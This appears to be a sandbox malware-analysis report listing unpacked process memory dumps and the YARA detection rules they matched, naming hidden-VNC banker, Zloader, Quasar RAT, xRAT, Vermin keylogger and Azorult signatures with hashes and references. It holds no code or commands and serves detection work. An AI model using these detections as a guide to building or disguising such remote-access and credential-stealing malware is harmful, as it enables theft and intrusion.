Source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
